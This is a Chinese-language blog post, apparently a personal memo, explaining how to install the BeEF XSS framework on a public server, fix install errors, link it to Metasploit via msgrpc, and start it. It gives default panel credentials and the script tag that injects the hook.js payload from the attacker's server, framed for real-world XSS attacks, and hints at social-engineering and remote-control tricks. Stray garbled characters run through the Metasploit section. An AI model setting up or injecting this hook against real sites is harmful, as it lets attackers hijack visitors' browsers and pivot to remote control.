beef xss framework 之前就玩过，之前也总结过，但是当时觉得这玩意太简单了，安装的几个问题也不大就没有写教程，指到今天又要装beef xss的时候我翻了下我以前记的笔记，懵逼了：

笔记记的过于简单，直接提醒自己看README，现在连下载都要百度，安装的时候报的错也要重新百度，所以这次干脆总结下，也算是给自己的备忘以下。

另外，可能很多朋友又要说，这玩意kali或者bt直接自带，哪还需要安装教程。

这类人我就不明白了，真实xss渗透的时候难道你还是内网？难道还得路由器转发？外网服务器难道不是必须品？

很多渗透组件，metasploit，nessus，beef等等组件不都得手动装吗，难道天天抱个本地kali自己日自己吗。

废话少说，进入正题。以下linux命令就不细说了，如果是debian系统，如kali，则用apt-get install安装，如有其他疑问的请自行百度。

beef xss framework下载

git clone https://github.com/beefproject/beef

安装及问题

gem install bundler

第一个错

-bash: gem: command not found

解决方法：yum install gem

第二个错

/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/bin/ruby
extconf.rb
mkmf.rb can't find header files for ruby at
/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/ruby.h

解决方法：yum install ruby-devel

bundle install

第三个错

An error occurred while installing do_sqlite3 (0.10.17), and Bundler cannot continue.
Make sure that `gem install do_sqlite3 -v '0.10.17'` succeeds before bundling.

没有报错则安装成功

链接msf

打开config.yaml这个文件，我们需要把里面关于metasploit的那一项开启如下图：6 r  c% w3 z” Z6 L4 Q” q
 ” E” m* m1 N) h4 r% ]  l
将metasploit的enable的项改成true就可以了，然后保存退出。下一步我们需要进入beEF下面的extensions/metasploit目录。如下图：! R2 Y0 I, }8 X7 E$ Z6 R1 K
 
打开这个config.yaml文件，并把这几个地方修改下：) ~. G  Z2 p’ C, @
 
这个地方ip改为你本机ip，不要用127.0.0.1。下面的路径为metasploit的路径，然后保存。  ]* q3 w5 _) i6 _7 M
然后把metasploit的服务开启，在命令行下用msfconsole把控制台打开，接着加载beEF。所用命令为：“load msgrpc ServerHost=192.169.60.19 Pass=abc123”” M, L/ J0 M” L1 m0 Y/ r

启动beef

启动很简单，直接./beef就可以，

如果后台运行可以：nohup ./beef &

使用方法

http://*****:3000/ui/panel

默认密码：beef  beef

 如需修改密码：beef xss framework修改默认登录密码

脚本地址：<script src=http://*****:3000/hook.js></script>

到这里不用再教了吧

有机会分享几个人使用的beef 猥琐社工+远控套路，真是有点舍不得啊~